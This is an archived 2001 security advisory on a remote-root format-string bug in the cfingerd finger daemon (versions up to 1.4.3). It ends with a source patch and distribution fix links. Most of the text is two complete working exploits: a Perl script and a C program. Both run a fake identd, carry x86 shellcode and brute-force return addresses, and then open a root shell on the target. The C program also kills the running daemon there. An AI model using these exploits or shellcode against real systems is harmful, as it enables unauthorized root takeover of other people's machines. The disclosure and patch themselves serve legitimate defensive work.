TUCoPS :: Unix :: General :: cfinger2.htm

Cfingerd <1.4.3 Remote Root Exploit
Vulnerability

    cfingerd

Affected

    cfingerd <=1.4.3

Description

    Megyer Laszlo found following. There is a critical bug in cfingerd
    daemon  <=  1.4.3,  (a  classic  format  bug)  that makes possible
    to acquire  full control  over the  remote machine  if it runs the
    cfingerd program, the configurable and secure finger daemon.  In 3
    words:  REMOTE ROOT VULNERABILITY.

    The bug occurs in main.c, line 245, 258 and 268:

                syslog(LOG_NOTICE, (char *) syslog_str);

    We  can  control  the  syslog_str  with  our ident user, that goes
    directly to the  secont parameter of  syslog(). Using %n  and some
    tricks,  we  can  overwrite  anything  in  the  daemon's   memory,
    including the saved eip register.

    The more or less proper usage of syslog this time is here:

                syslog(LOG_NOTICE, "%s", (char *) syslog_str);

    There  are  many  papers  about  format  bugs,  so  we don't write
    detailed infos about it.

    Exploiting it is a  bit tricky because we  use another bug in  the
    code.  The ident reply is something like this:

        3478, 79 : UNIX : USERID : username

    If the username is more than 64 bytes, cfingerd logs some  strange
    string:

        [64b username]3478, 79 : UNIX : USERID : [64b username][rest of the username]

    The following code is responsible of this strange behaviour:

        for (xp=uname; *cp != '\0' &&
        *cp!='\r'&&*cp!='\n'&&strlen(uname)<sizeof(uname); cp++)
            *(xp++) = *cp;

    You can see that no space is left for the string terminating  '\0'
    character, so the next local  variable which is the line  that was
    read from identd will also be returned as the end of the username.
    Example, the fake identd sends:

        [120 B's] : : :[64 A's]
        the username that is returned by get_rfc1413_data() will be:
        [64 A's][120 B's] : : :...

    Then an snprintf cuts the string that will go to syslog() allowing
    only 200 bytes to pass.  If the username is one byte, we will have
    183 bytes we can control there. ("a fingered from  username@host")
    where host  doesn't have  place, so  it won't  get into  syslog().
    (another sechole).

    Now we have a  method to send 183  bytes to syslog().   We have to
    find out some  basic variables to  be able to  exploit this, which
    we can bruteforce easily one-by-one (details in "fingex" exploit).

    #!/usr/bin/perl
    # Cfingerd exploit to the recent syslog format bug.
    # Discovered and written by Lez <abullah@freemail.hu> in 2001.
    # you have to use it as root to bind port 113.

    # tested on Debian 2.1, 2.2

    use IO::Socket;
    #use strict;

    my $network_timeout=5;
    my $sleep_between_fingers=2;  # should be enough
    my $debug_sleep=0;

    my $fingerport=79;
    my $target=$ARGV[0];
    my $debug=1;
    my $test_vulnerability=1;

    # Debian 2.2, cfingerd 1.4.1-1
    #my $control=33;  # if don't set it, exploit will find.
    #my $align=0;     # the same
    #$retaddr=0xbffffab0;
    # my $retaddr=0xbffff880;  # the same
    #$retaddr=0xbffff840;


    my $retvalue=0xbffff980;  # If it finds everything correctly, and says Shell lunched, but
			      # you can't find your uid 0, decrease $retvalue by 30.
    my $bytes_written=32;

    #$control=17;
    #$align=0;
    #$retaddr=0xbffffb80;   #(or 0xbffffb68 0xbffff9d0 0xbffff9cc 0xbffff9c8)
    #$retvalue=0xbffffc20;
    #$bytes_written=32;



    # GOOD:
    my $startsig11=0xbffffbfc;
    my $endsig11=  0xbffff000;

    my $controlstart=45;
    my $controlend=1;

    my $fclient;

    my $shellcode ="\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xb0\x2e\xcd\x80".
	        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b".
	        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd".
	        "\x80\xe8\xdc\xff\xff\xff/bin/sh";
							    #59 bytes

    if (!$target) {print "Usage: $0 target\n";exit}

    # Starting fake identd
    my $identd = IO::Socket::INET->new(
		    Listen => 5,
		    LocalPort => 113,
		    Proto     => 'tcp',
		    Reuse     => 3) or die "Cannot listen to port 113: $!\n";

    if ($test_vulnerability) {&testvuln}

    if (!$control) { &get_control_and_align }
    else {print "Alignment: $align\nControl: $control\n" }

    if (!$retaddr) {
        &find_and_exploit_sigsegv_values
    }
    else {
        printf "Using provided RET address: 0x%x\n",$retaddr;
        &exploit ($retaddr, $retvalue);
    }


    exit;




    sub sendthisone { #sends a string to cfingerd, and returns 1 if the remote machine got SIGSEGV or SIGILL.
		      # a bit tricky
        my $text_to_send=$_[0];

        $text_to_send =~ s/^\ /\ \ /;

        my ($last_119, $gotback);

        $fclient = IO::Socket::INET->new("$target:$fingerport") or die "Cannot connect to $target: $!\n";
        print $fclient "e\n"; # e is the username we query.

        my $ident_client = $identd-> accept;

        my $tmp=<$ident_client>;


        my $first_64= substr($text_to_send, 0, 64);
        if (length($text_to_send) > 64) {
	    $last_119= substr($text_to_send,64);
        }

        sleep $debug_sleep;

        print $ident_client "$last_119: : :$first_64\n"; # we use an other bug
                                                         # in rfc query function
                                                         # to send longer lines.
        close $ident_client;

        eval {
	    local $SIG{ALRM} = sub { die "alarm\n"};
	    alarm ($network_timeout);
	    $gotback= <$fclient>;
	    alarm 0;
        };
        if ($@) {
	    die unless $@ eq "alarm\n";
	    &shell;
        }

        if ($gotback =~ /SIGSEGV/i) {
	    if ($debug == 2) {print "Sending $first_64$last_119: SIGSEGV\n";}
	    elsif ($debug == 1) {system ("echo -n \"*\"");}
	    sleep ($sleep_between_fingers);
	    return 1;
        } elsif ($gotback =~ /SIGILL/i) {
	    if ($debug == 2) {print "Sending $first_64$last_119: SIGILL\n";}
	    elsif ($debug == 1) {system ("echo -n +");}
	    print "Got signal \"Illegal instruction\".\nThe ret address is not correct\n";
	    sleep ($sleep_between_fingers);
	    return 1;
        } else {
	    if ($debug == 2) {print "Sending $first_64$last_119\n";}
	    elsif ($debug == 1) {system ("echo -n .");}
	    sleep ($sleep_between_fingers);
	    return 0;
        }
    }


    sub get_control_and_align {
        for ($control=$controlstart; $control >= $controlend; $control--) {
	    for ($align=3; $align>=0; $align--) {
	        my $s1= "A"x$align . "\x79\xff\xff\xbe" . "%" . $control . "\$n";
	        my $s2= "A"x$align . "\x79\xff\xff\xbf" . "%" . $control . "\$n";

	        if (sendthisone($s1) > sendthisone ($s2)) {
		    print "\nControl: $control\nAlign: $align\n";
		    return;
	        }
	    }
        }
        die "Could not find control and alignment values\n";
    }

    sub find_and_exploit_sigsegv_values {
        my ($sendbuf, @back, $addy, $retaddr, $save);

        print "Searching for eip addresses...\n";

        for ($addy=$startsig11; $addy >= $endsig11; $addy -=4) {
	    $sendbuf = "a"x$align . pack "cccc",$addy,$addy>>8,$addy>>16,$addy>>24;
	    $sendbuf .= "%" . $control . "\$n";

	    if ($addy%0x100) {
	        if (sendthisone($sendbuf)) {

		    &exploit ($addy, $retvalue);    # I'm so lazy
		    &exploit ($addy, $retvalue-60);
		    &exploit ($addy, $retvalue+60);
		    &exploit ($addy, $retvalue-120);
		    &exploit ($addy, $retvalue+120);
		    &exploit ($addy, $retvalue-180);
		    &exploit ($addy, $retvalue+180);
		    &exploit ($addy, $retvalue-240);
		    &exploit ($addy, $retvalue+240);
		    &exploit ($addy, $retvalue-300);
		    &exploit ($addy, $retvalue+300);
		    &exploit ($addy, $retvalue-360);
		    &exploit ($addy, $retvalue+360);
		    &exploit ($addy, $retvalue-420);
		    &exploit ($addy, $retvalue+420);

	        }
	    }
        }
    }

    sub exploit {

        my $addy=$_[0];
        my $value=$_[1];

        my $sendbuf;

        printf "\nExploiting 0x%x, ret:0x%x.\n",$addy,$value;

        $sendbuf = "Z"x$align;
        $sendbuf .= &add_four_addresses($addy);
        $sendbuf .= &add_format_strings($value);

        $sendbuf .= "\x90"x (182-length($sendbuf)-length($shellcode));
        $sendbuf .= $shellcode;

        &sendthisone ($sendbuf);
    }

    sub add_four_addresses {
        my $addy=$_[0];
        my ($back, $i);

        for ($i=0; $i<=3; $i++) {
	    $back .= pack "cccc",
		        ($addy+$i),
		        ($addy+$i)>>8,
		        ($addy+$i)>>16,
		        ($addy+$i)>>24;
        }
        return $back;
    }

    sub add_format_strings {
        my ($back, $i, @a, $xvalue, $nvalue, $back);
        my $ret=$_[0];

        $a[0]=$ret%0x100-$bytes_written;

        for ($i=1; $i<=3; $i++) {
	    $a[$i]= ($ret >> (8*$i) )%0x100 - ($ret >> (8*($i-1)) )%0x100;
        }

        for ($i=0; $i<=3; $i++) {
            $xvalue= &positive($a[$i]);
            $nvalue= $control+$i;

            if ($xvalue <=8) {
                $back .= "A"x$xvalue          .       "%".$nvalue."\$n";
            } else {
                $back .= "%0".$xvalue."x"     .       "%".$nvalue."\$n";
            }
        }
        return $back;
    }

    sub positive {
        my $number=$_[0];
        while ($number < 0) {
            $number += 0x100;
        }
        return $number;
    }

    sub shell {
        my ($cucc, $msg);

        print "Shell launched\n";
        print $fclient "id\n";
        print &my_line(1);

        while (1) {
            $cucc=<STDIN>;
            print $fclient $cucc;

            while ($msg=&my_line(1)) {
    	        print $msg;
            }
        }
    }

    sub my_line {
        my $msg;
        eval {
            local $SIG{ALRM} = sub { die "\n"};
            alarm ($_[0]);
            if ($msg=<$fclient>) {
                alarm (0);
                return $msg;
            }
        };
    }

    sub testvuln {
        if ($debug) {print "Testing if fingerd is vulnerable...   "}
        if (&sendthisone ("%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n")) {
	    print "Yes.\n";
	    return;
        } else {
	    print "No.\n";
	    exit;
        }
    }

    Following is another exploit for it.

    /* remote exploit for linux/x86 - cfingerd <= 1.4.3
     * coded by venomous of rdC - 16/apr/01
     *
     * Its just a common formatstring bug using syslog() incorrectly.
     * We need to bind as identd, so disable your identd in case you are
     * using it.
     *
     * BONUS: eip address is bruteforced, so relax and wait =)
     *
     * NOTE: for sure where we control the format string will change from
     *       platform to platform.
     *       And for sure, the shellcode address will change so maybe you
     *       want to bruteforce this too. (-1500 to +1500 should be fine i guess)
     *
     * REMEMBER: this code is for educational propourses only, do not use
     *           it on machines without authorization.
     *
     * INFO: cfingerd isnt a package of slackware 7.0
     *       cfingerd 1.4.1 is a package of debian 2.2
     *
     * Greets: ka0z, bruj0, dn0, superluck, fugitivo(!)
     *         #flatline, #rdC
     *
     * Credits: To Lez, who found this bug.
     *
     * http://www.rdcrew.com.ar - Argentinian Security Group.
     * venomous@rdcrew.com.ar
     */
    
    
    #include <stdio.h>
    #include <netinet/in.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netdb.h>
    #include <signal.h>
    #include <sys/types.h>
    #include <sys/wait.h>
    #include <unistd.h>
    
    #define ROOTSHELLPORT 36864
    
    void chld_timeo();
    void chld_timeoo();
    
    int sserver;
    int cserver;
    int phase=0;
    int mmm=0;
    
    unsigned long glob;
    //unsigned long startaddr = 0xbffffdfc;
    unsigned long startaddr = 0xbffffb34;
    unsigned long stopaddr  = 0xbffff000;
    
    char pbuf[1024];
    
    char testcode[]=
        "\xeb\x0b\x2e\x72\x64\x43\x2e\x72\x6f\x63\x6b\x73\x2e\xeb\xfe";
    
    char linuxcode[]=
        /* Lamagra bind shellcode modified by me, making it smaller =) - 124b */
        "\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
        "\x40\x89\xc3\x89\x46\x0c\x40\x89"
        "\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
        "\x80\x43\xc6\x46\x10\x10\x88\x46"
        "\x08\x31\xc0\x31\xd2\x89\x46\x18"
        "\xb0\x90\x66\x89\x46\x16\x8d\x4e"
        "\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
        "\x66\xcd\x80\x89\x5e\x0c\x43\x43"
        "\xb0\x66\xcd\x80\x89\x56\x0c\x89"
        "\x56\x10\xb0\x66\x43\xcd\x80\x86"
        "\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
        "\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
        "\x80\x88\x56\x07\x89\x76\x0c\x87"
        "\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
        "\xe8\x8d\xff\xff\xff\x2f\x62\x69"
        "\x6e\x2f\x73\x68";
    
    struct os
    {
        int id;
        char *os;
        char *shellcode;
        int fsc;
        unsigned long shaddr;
        int offset;
    };
    
    struct os types[]=
    {
        {0, "slackware 7.0 - compiled cfingerd 1.4.2/1.4.3 running from inetd as root", linuxcode, 22, 0xbffffbc4, 30},
        {1, "slackware 7.0 - compiled cfingerd 1.4.2/1.4.3 running from inetd as nobody", linuxcode, 22, 0xbffffbc4, 30},
        {2, "debian 2.2 - default cfingerd 1.4.1 running from inetd as root", linuxcode, 33, 0xbffffb48, 0},
        {3, "debian 2.2 - default cfingerd 1.4.1 running from inetd as nobody", linuxcode, 33, 0xbffffb48, 0},
        {4, NULL, 0, 0xdeadbeef, 0}
    };
    
    main(int argc, char *argv[])
    {
        struct sockaddr_in sin;
        struct sockaddr_in ssin;
        int fd;
        int x;
        int xx=0;
        int sts=0;
        int pete;
        int a,b,c=22,d=0; /* c is used in case you want to seek the fsc on   */
        int guide=1;      /* your system, starting from 22, change it if you */
        int sel=0;        /* want.                                           */
        int bleh=0;       /*                                                 */
        int off=0;
        int arx=0;
        int niu=0;
        int ye=0;
        char buf[1024];
        char tex[512];
    
        if (argc < 4)
        {
            printf("cfingerd <= 1.4.3 remote exploit coded by venomous of rdC\n\n");
            printf("Usage: %s <platform> <host> <offset>\n",argv[0]);
            printf("where <platform> is:\n");
            for (x=0 ; types[x].os != NULL ; x++)
                printf("%d for %s\n", types[x].id, types[x].os);
            printf("\nhttp://www.rdcrew.com.ar\n\n");
            exit(1);
        }
    
        for (x=0 ; types[x].os != NULL ; x++)
        {
            if (types[x].id == atoi(argv[1]) )
            {
                xx++;
                sel = types[x].id;
            }
        }
        if (!xx)
        {
            printf("Unknown platform: %s\n",argv[1]);
            exit(1);
        }
    
        off = atoi(argv[3]);
        printf("Selected platform: %s (%d)\n",types[sel].os,sel);
        bzero(&sin,sizeof(sin));
    
        // fake identd
        sin.sin_family = AF_INET;
        sin.sin_port = htons(113);
        sin.sin_addr.s_addr = htonl(INADDR_ANY);
    
        if ( (fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
        {
            perror("socket");
            exit(1);
        }
        if ( (x = bind(fd,(struct sockaddr *)&sin, sizeof(sin)) < 0))
        {
            perror("bind");
            exit(1);
        }
    
        if ( (xx = listen(fd, 5)) < 0)
        {
            perror("listen");
            exit(1);
        }
    
        printf("fake identd bound successfuly\n\n");
        printf("pre-phase info: If you need to use the offset you can use safely steps of 120\n\n");
        printf("phase 0: finding eip...  \n");
        while (guide)
        {
            //maybe you need it..
            //        if (!d)
            //        {
            preparebuf(sel, off, ye);
            fconnect(argv[2], ye, 79);
            //        }
    
            pete = sizeof(ssin);
            if ( (sserver = accept(fd, (struct sockaddr *)&ssin, &pete)) < 0)
            {
                perror("accept");
                exit(1);
            }
            bzero(buf,sizeof(buf));
            read(sserver,buf,sizeof(buf));
    
            //horrendus debug! :)
    #ifdef DEBUG
            printf("\nread(): %s\n",buf);
    #endif
            sscanf(buf,"%d,%d",&a,&b);
            bzero(buf,sizeof(buf));
            bzero(tex,sizeof(tex));
            memset(tex,'\x90',119);
    
            bleh=strlen(pbuf);
            niu = 0;
    
            while (1)
            {
                if(strlen(pbuf) < 65)
                {
                    if (phase==0)
                        pbuf[bleh] = '\x90';
                    else
                        pbuf[bleh] = types[sel].shellcode[niu];
                    bleh++;
                    if (phase==1)
                        niu++;
                }
                else
                    break;
            }
            arx = niu;
    
            if(!phase)
                for(bleh=0 ; bleh < strlen(testcode) ; bleh++)
                    tex[119 - strlen(testcode) + bleh] = testcode[bleh];
    
            else
            {
                if ((119 - (strlen(types[sel].shellcode) - arx)) < 0)
                {
                    printf("shellcode too long, exiting\n");
                    exit(0);
                }
    
                for ( bleh=0 ; bleh < ( (strlen(types[sel].shellcode)) - arx) ; bleh++)
                    tex[119 - (strlen(types[sel].shellcode)) - arx + bleh] = types[sel].shellcode[bleh+arx];
            }
    
            snprintf(buf,sizeof(buf),"%s : : : %s", tex, pbuf);
            /* usefull for find the fsc on your system.
             //snprintf(buf,sizeof(buf),"%d , %d : UNIX : 1 : AAAA%%%d$p:fsc:%d\n",a,b,c,c);
            // read about 'd' below
            if (d==2) { c++; d=0; }
            */
            write(sserver,buf,sizeof(buf));
    
            //the same..
    #ifdef DEBUG
            printf("sent: %s\n--------------------\n",buf);
    #endif
            close(sserver);
            sleep(2);
    
            //same..
            //      if(d)
            wait(&sts);
            //      d++;
    
            /* if something like tcplogd is running there will be 3 connections
             * to identd, so in that case, d==3
             */
            //if(d==2)
            //    d=0;
    
            if ((WEXITSTATUS(sts)) == 1) // eip/shellcode address ok (at phase 0)
            {
                phase=1; ye=1; sts=0;
                printf("\nphase 1: calculating address of the first chacarcter in our buffer... wait\n");
            }
    
            if ((WEXITSTATUS(sts)) == 2) // shellcode executed (at phase 1)
            {
                printf("\nphase 2 connecting to rootshell... ");
                fflush(stdout);
                close(fd); //identd fake server
                fconnect(argv[2], 2, ROOTSHELLPORT);
                printf("\n\nThanks for using rdC products!\n\n");
                exit(0);
            }
        }
    }
    
    int fconnect(char *hname, int what, int port)
    {
        struct hostent *host;
        struct sockaddr_in d;
        int r;
        char hname2[128];
        char response[1024];
        d.sin_family = AF_INET;
        d.sin_port = htons(port);
    
        bzero(hname2,sizeof(hname2));
        strncpy(hname2,hname,sizeof(hname2));
        host = gethostbyname(hname2);
        if (!host)
        {
            printf("cannot resolve\n");
            exit(0);
        }
    
        bcopy(host->h_addr, (struct in_addr *)&d.sin_addr, host->h_length);
    
        cserver = socket(AF_INET, SOCK_STREAM, 0);
    
        // you can add a timeout here, but supossly you know if the server
        // is up/not firewalled, because you are using it against an authorized
        // machine and not in a script/not authorized machine, right?
    
        if (connect(cserver, (struct sockaddr *)&d, sizeof(struct sockaddr)) < 0)
        {
            perror("connect");
            exit(1);
        }
    
        if (what==2)
        {
            printf("connected!\n");
            fflush(stdout);
            rootsox(cserver);
            close(cserver);
            return;
        }
    
        write(cserver,"a\n",strlen("a\n"));
    
        if ((fork()) == 0)
        {
            printf("Waiting response...");
            for(r=0 ; r < 19 ; r++)
                printf("\b");
            fflush(stdout);
            bzero(response,sizeof(response));
            if (what==0)
                signal(SIGALRM, chld_timeo);
            else
                signal(SIGALRM, chld_timeoo);
    
            alarm(30);
            read(cserver,response,sizeof(response));
            if (strstr(response,"SIGILL"))
            {
                printf("Illegal Instruction\r");
                fflush(stdout);
                close(cserver);
                exit(0);
            }
            if (strstr(response,"SIGSEGV"))
            {
                printf("Segmentation Fault.\r");
                fflush(stdout);
                close(cserver);
                exit(0);
            }
            //you might add strings here..
            if (strstr(response,"Sorry, that user doesn't exist") || strstr(response,"Debian GNU/Linux"))
            {
                printf("server not crashed.\r");
                fflush(stdout);
                close(cserver);
                exit(0);
            }
        }
        //close(cserver);
    }
    
    /* <huh> */
    void chld_timeo()
    {
        alarm(0);
        signal(SIGALRM, SIG_DFL);
        printf("EIP FOUND! - SHELLCODE ADDR OK!\n");
        fflush(stdout);
        close(cserver);
        exit(1);
    }
    
    void chld_timeoo()
    {
        alarm(0);
        signal(SIGALRM, SIG_DFL);
        printf("shellcode executed!\n");
        fflush(stdout);
        close(cserver);
        exit(2);
    }
    /* </huh> */
    
    int rootsox(int sox)
    {
        fd_set  rset;
        int     n;
        char    buffer[4096];
    
        /* we kill the cfingerd in eternal loop and we run other nice commands ;)
         */
        char *command="/bin/killall -9 cfingerd ; /bin/uname -a ; /usr/bin/id\n";
    
        send(sox, command, strlen(command), 0);
    
        for (;;) {
            FD_ZERO (&rset);
            FD_SET (sox, &rset);
            FD_SET (STDIN_FILENO, &rset);
    
            n = select(sox + 1, &rset, NULL, NULL, NULL);
            if(n <= 0)
                return (-1);
    
            if(FD_ISSET (sox, &rset)) {
                n = recv (sox, buffer, sizeof (buffer), 0);
                if (n <= 0)
                    break;
    
                write (STDOUT_FILENO, buffer, n);
            }
    
            if(FD_ISSET (STDIN_FILENO, &rset)) {
                n = read (STDIN_FILENO, buffer, sizeof (buffer));
                if (n <= 0)
                    break;
    
                send(sox, buffer, n, 0);
            }
        }
        return 0;
    }
    
    //heavly modified formatstring engine from rdC-LPRng.c exploit - 12/00
    preparebuf(int sel, int off, int what)
    {
        unsigned long addr;
        unsigned long a, b, c, d;
        int pas1,pas2,pas3,pas4;
        int i;
        char temp[512];
        char buf[512];
        char atemp[128];
        char bufx[512];
    
        startaddr = startaddr - 0x4;
        addr = startaddr;
    
        bzero(temp,sizeof(temp));
        bzero(buf,sizeof(buf));
        bzero(bufx,sizeof(bufx));
        bzero(atemp,sizeof(atemp));
    
        if (addr == stopaddr)
        {
            printf("\nreached stopaddr, change shellcode address/fsc\n");
            exit(1);
        }
    
        if(what)
        {
            off-=mmm;
            mmm++;
        }
    
        if (mmm == 185)
        {
            printf("?!.. we cant find the first character of our shellcode!#@\n");
            exit(0);
        }
    
        snprintf(temp,sizeof(temp),"%p",types[sel].shaddr+types[sel].offset+off);
        sscanf(temp,"0x%2x%2x%2x%2x",&a,&b,&c,&d);
        pas1 = d - (16 * 2);
        pas1 = cn(pas1);
        pas2 = c - d;
        pas2 = cn(pas2);
        pas3 = b - c;
        pas3 = cn(pas3);
        pas4 = a - b;
        pas4 = cn(pas4);
    
        if(what)
            addr = glob;
        else
            glob = addr;
    
        printf("eip: %p - shellcode addr: %p - ",addr,types[sel].shaddr+types[sel].offset+off);
        fflush(stdout);
    
        for (i=0 ; i < 4 ; i++)
        {
            snprintf(atemp,sizeof(atemp),"%s",&addr);
            strncat(buf, atemp, 4);
            addr++;
        }
    
        snprintf(bufx,sizeof(bufx),"%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n",pas1,(types[sel].fsc),pas2,(types[sel].fsc)+1,pas3,(types[sel].fsc)+2,pas4,types[sel].fsc+3);
        strcat(buf,bufx);
        bzero(pbuf,sizeof(pbuf));
        strncpy(pbuf,buf,sizeof(pbuf));
    }
    
    cn(unsigned long addr)
    {
        char he[128];
    
        snprintf(he,sizeof(he),"%d",addr);
        if (atoi(he) < 8)
            addr = addr + 256;
    
        return addr;
    }

Solution

    The attached  patch will  fix the  four bugs:  3 syslog() bugs and
    the bug that allows anybody to send long usernames to syslog()  so
    the hostname wouldn't get there.   To make a bugfixed source  tree
    save the diff as cfingerd-1.4.3.diff and do:

    wget
    http://www.infodrom.ffis.de/projects/cfingerd/download/cfingerd-1.4.3.tar.gz
    tar xfz cfingerd-1.4.3.tar.gz
    cat cfingerd-1.4.3.diff | patch -p0

    and the source tree is free of this bug.

    --- cfingerd-1.4.3/src/main.c.orig	Fri Aug  6 23:33:38 1999
    +++ cfingerd-1.4.3/src/main.c	Wed Apr 11 18:55:43 2001
    @@ -242,7 +242,7 @@
 	        if (!emulated) {
 		    snprintf(syslog_str, sizeof(syslog_str), "%s fingered (internal) from %s", username,
 		        ident_user);
    -		syslog(LOG_NOTICE, (char *) syslog_str);
    +		syslog(LOG_NOTICE, "%s", (char *) syslog_str);
 	        }

 	        handle_internal(username);
    @@ -255,7 +255,7 @@
 		        snprintf(syslog_str, sizeof(syslog_str), "%s fingered from %s",
 			    prog_config.p_strings[D_ROOT_FINGER], ident_user);

    -		syslog(LOG_NOTICE, (char *) syslog_str);
    +		syslog(LOG_NOTICE, "%s", (char *) syslog_str);
 	        }

 	        handle_standard(username);
    @@ -265,7 +265,7 @@
 		    snprintf(syslog_str, sizeof(syslog_str), "%s %s from %s", username,
 		        prog_config.p_strings[D_FAKE_USER], ident_user);

    -		syslog(LOG_NOTICE, (char *) syslog_str);
    +		syslog(LOG_NOTICE, "%s", (char *) syslog_str);
 	        }

 	        handle_fakeuser(username);
    --- cfingerd-1.4.3/src/rfc1413.c.orig	Sun Aug 29 14:14:25 1999
    +++ cfingerd-1.4.3/src/rfc1413.c	Wed Apr 11 18:53:45 2001
    @@ -98,7 +98,7 @@

 	    if (*(++cp) == ' ') cp++;
 	    memset(uname, 0, sizeof(uname));
    -	for (xp=uname; *cp != '\0' && *cp!='\r'&&*cp!='\n'&&strlen(uname)<sizeof(uname); cp++)
    +	for (xp=uname; *cp != '\0' && *cp!='\r'&&*cp!='\n'&&(strlen(uname)+1)<sizeof(uname); cp++)
 	        *(xp++) = *cp;

 	    if (!strlen(uname)) {

    For Debian Linux:

        http://security.debian.org/dists/stable/updates/main/source/cfingerd_1.4.1-1.1.diff.gz
        http://security.debian.org/dists/stable/updates/main/source/cfingerd_1.4.1-1.1.dsc
        http://security.debian.org/dists/stable/updates/main/source/cfingerd_1.4.1.orig.tar.gz
        http://security.debian.org/dists/stable/updates/main/binary-alpha/cfingerd_1.4.1-1.1_alpha.deb
        http://security.debian.org/dists/stable/updates/main/binary-arm/cfingerd_1.4.1-1.1_arm.deb
        http://security.debian.org/dists/stable/updates/main/binary-i386/cfingerd_1.4.1-1.1_i386.deb
        http://security.debian.org/dists/stable/updates/main/binary-m68k/cfingerd_1.4.1-1.1_m68k.deb
        http://security.debian.org/dists/stable/updates/main/binary-powerpc/cfingerd_1.4.1-1.1_powerpc.deb
        http://security.debian.org/dists/stable/updates/main/binary-sparc/cfingerd_1.4.1-1.1_sparc.deb

    For Progeny Linux:

        http://archive.progeny.com/progeny/updates/newton/cfingerd_1.4.1-1.1_i386.deb

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH